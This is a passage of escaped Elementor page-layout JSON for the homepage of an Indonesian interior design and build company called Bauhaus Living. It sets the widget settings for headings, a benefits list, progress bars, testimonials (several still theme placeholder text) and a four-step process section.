sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\